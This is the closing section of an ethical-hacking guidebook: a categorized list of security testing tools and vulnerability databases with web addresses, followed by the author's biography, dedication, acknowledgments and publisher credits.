NIST's SP 800-58 document — http://csrc.nist.gov/publications/nistpubs/800-58/SP800-58-final.pdf

OmniPeek — www.savvius.com/products/overview/omnipeek_family/omnipeek_network_analysis

PROTOS — www.ee.oulu.fi/research/ouspg/Protos

VoIP Hopper — http://voiphopper.sourceforge.net

vomit — http://vomit.xtdnet.nl

Vulnerability Databases

Common Vulnerabilities and Exposures — http://cve.mitre.org

CWE/SANS Top 25 Most Dangerous Programming Errors — www.sans.org/top25-software-errors

National Vulnerability Database — http://nvd.nist.gov

SANS Critical Security Controls — www.sans.org/critical-security-controls

US-CERT Vulnerability Notes Database — www.kb.cert.org/vuls

Websites and Applications

Acunetix Web Vulnerability Scanner — www.acunetix.com

AppSpider — www.rapid7.com//products//appspider

Brutus — www.hoobie.net/brutus/index.html

Burp Proxy — https://portswigger.net/burp/proxy.html

Checkmarx CxDeveloper — www.checkmarx.com

Defaced websites — http://zone-h.org/archive

Firefox Web Developer — http://chrispederick.com/work/web-developer

Foundstone's SASS Hacme Tools — www.mcafee.com/us/downloads/free-tools/index.aspx

Google Hack Honeypot — http://ghh.sourceforge.net

Google Hacking Database — www.exploit-db.com/google-hacking-database

HTTrack Website Copier — www.httrack.com

Netsparker — www.netsparker.com

Paros Proxy — http://sourceforge.net/projects/paros

Port80 Software's ServerMask — www.port80software.com/products/servermask

Qualys SSL Labs — www.ssllabs.com

SiteDigger — www.mcafee.com/us/downloads/free-tools/sitedigger.aspx

SQL Inject Me — https://addons.mozilla.org/en-us/firefox/addon/sql-inject-me

SQL Power Injector — www.sqlpowerinjector.com

THC-Hydra — www.thc.org/thc-hydra

Veracode — www.veracode.com

WebGoat — www.owasp.org/index.php/Category:OWASP_WebGoat_Project

WebInspect — www8.hp.com/us/en/software-solutions/webinspect-dynamic-analysis-dast/index.html

WSDigger — www.mcafee.com/us/downloads/free-tools/wsdigger.aspx

WSFuzzer — www.owasp.org/index.php/Category:OWASP_WSFuzzer_Project

Windows

BitLocker security whitepapers — www.principlelogic.com/bitlocker.html

DumpSec — www.systemtools.com/somarsoft/?somarsoft.com

GFI LanGuard — www.gfi.com/network-security-vulnerability-scanner

Microsoft Baseline Security Analyzer — https://technet.microsoft.com/en-us/security/cc184924.aspx

Network Users — www.optimumx.com/download/netusers.zip

Nexpose — www.rapid7.com/products/nexpose/compare-downloads.jsp

QualysGuard — www.qualys.com

SoftPerfect Network Scanner — www.softperfect.com/products/networkscanner

Sysinternals — https://technet.microsoft.com/en-us/sysinternals/default.aspx

Winfo — www.ntsecurity.nu/toolbox/winfo

Wireless Networks

Aircrack-ng — http://aircrack-ng.org

AirMagnet WiFi Analyzer — www.flukenetworks.com/enterprise-network/wireless-network/airmagnet-wifi-analyzer

Asleap — http://sourceforge.net/projects/asleap

CommView for WiFi — www.tamos.com/products/commwifi

Digital Hotspotter — www.canarywireless.com

ElcomSoft Wireless Security Auditor — www.elcomsoft.com/ewsa.html

Homebrew WiFi antenna — www.turnpoint.net/wireless/has.html

Kismet — www.kismetwireless.net

NetStumbler — www.netstumbler.com

OmniPeek — www.savvius.com/products/overview/omnipeek_family/omnipeek_network_analysis

Reaver — https://code.google.com/p/reaver-wps

SuperCantenna — www.cantenna.com

Wellenreiter — http://sourceforge.net/projects/wellenreiter

WEPCrack — http://wepcrack.sourceforge.net

WiFinder — www.boingo.com/retail/#s3781

WiFi Pineapple — www.wifipineapple.com/index.php

WiGLE database of wireless networks — https://wigle.net

WinAirsnort — http://winairsnort.free.fr

About the Author

Kevin Beaver is an independent information security consultant, expert witness, professional speaker, and writer with Atlanta-based Principle Logic, LLC. He has nearly three decades of experience in IT and over 20 years in security. Kevin specializes in performing independent information security assessments for corporations, security product vendors, software developers/cloud service providers, government agencies, and nonprofit organizations. Before starting his information security consulting practice in 2001, Kevin served in various information technology and security roles for several healthcare, e-commerce, financial, and educational institutions.

Kevin has appeared on CNN television as an information security expert and has been quoted in The Wall Street Journal, Entrepreneur, Fortune Small Business, Women's Health, and on Inc. magazine's technology site, IncTechnology.com. Kevin's work has also been referenced by the PCI Council in their Data Security Standard Wireless Guidelines. Kevin has been a top-rated speaker, giving hundreds of presentations and panel discussions for IT and security seminars, conferences, and webcasts over the past decade and a half.

Kevin has authored or co-authored 12 information security books, including Hacking Wireless Networks For Dummies, Implementation Strategies for Fulfilling and Maintaining IT Compliance (Realtimepublishers.com), and The Practical Guide to HIPAA Privacy and Security Compliance (Auerbach). Kevin has written more than three dozen whitepapers and over 900 articles and guest blog posts for sites such as TechTarget's SearchSecurity.com, Ziff Davis' Toolbox.com, and IBM's SecurityIntelligence.com. Kevin is the creator and producer of the Security On Wheels audiobooks, which provide security learning for IT professionals on the go (securityonwheels.com), and the Security On Wheels blog (securityonwheels.com/blog). He also covers information security and related matters on Twitter (@kevinbeaver) and YouTube (PrincipleLogic). Kevin earned his bachelor's degree in Computer Engineering Technology from Southern College of Technology and his master's degree in Management of Technology from Georgia Tech. He obtained his CISSP certification in 2001 and also holds MCSE, Master CNE, and IT Project+ certifications.

Kevin can be reached through his website, www.principlelogic.com, and you can connect to him via LinkedIn at www.linkedin.com/in/kevinbeaver.

Dedication

Dad, this one's for you. I wouldn't be here today without your guidance and support. You've taught me so much about common sense — its absence in much of the world and how important it is for being successful no matter what the endeavor. I love you very much.

Author's Acknowledgments

I want to thank Amy, Garrett, and Mary Lin for your loving ways, funny jokes, and willingness to deal with my nonsense day in and day out, especially since I've been working on the updates to this edition! I still love each of you 100 percent!

I'd also like to thank Amy Fandrei, my acquisitions editor, for continuing this project and presenting me the opportunity to shape this book into something I'm very proud of. I'd like to thank my project editor, Katharine Dvorak. You've been very patient and great to work with! I'm looking forward to working with you again in the future. Also, many thanks to my technical editor, business colleague, friend, and co-author of Hacking Wireless Networks For Dummies, Peter T. Davis. I'm honored (as always) to be working with you and very much appreciate your feedback on this edition! I also want to extend a sincere thanks to Richard Stiennon — I'm flattered that such a strong leader in my field was willing to write the Foreword to this book.

Much gratitude to Robert Abela with Netsparker; Nate Crampton, Ryan Poppa, Alan Lipton, HD Moore, Justin Warren, and Dan Kuykendall with Rapid7; Vladimir Katalov and Olga Koksharova with ElcomSoft; Cristian Florian with GFI Software; Maty Siman and Asaph Schulman with Checkmarx; Dmitry Sumin with Passware; Kirk Thomas with Northwest Performance Software; David Vest with Mythicsoft; Michael Berg with TamoSoft; Terry Ingoldsby with Amenaza Technologies; and Oleg Fedorov with Oxygen Software Company for responding to all of my requests. Continued thanks to Dave Coe for your help in keeping me current on the latest security tools and hacks! Much gratitude to all the others I forgot to mention as well.

Mega thanks to Rush and Dream Theater for your inspirational words and driving sounds to get me through the not-feeling-creative times working on this edition!

Finally, I want to express my sincere appreciation to my clients for continuing to hire me, the "no-name-brand" consultant who works for himself, and keeping me around for the long term. I wouldn't be here without your willingness to break out of the "must hire big company" mindset and your continued support. Thank you very much!

Publisher's Acknowledgments

Acquisitions Editor: Amy Fandrei

Project Editor: Katharine Dvorak

Technical Editor: Peter T. Davis

Sr. Editorial Assistant: Cherie Case

Production Editor: Kinson Raja

Cover Image: Denis Vrublevski/Shutterstock

To access the cheat sheet specifically for this book, go to www.dummies.com/cheatsheet/hacking.


WILEY END USER LICENSE AGREEMENT

Go to www.wiley.com/go/eula to access Wiley's ebook EULA.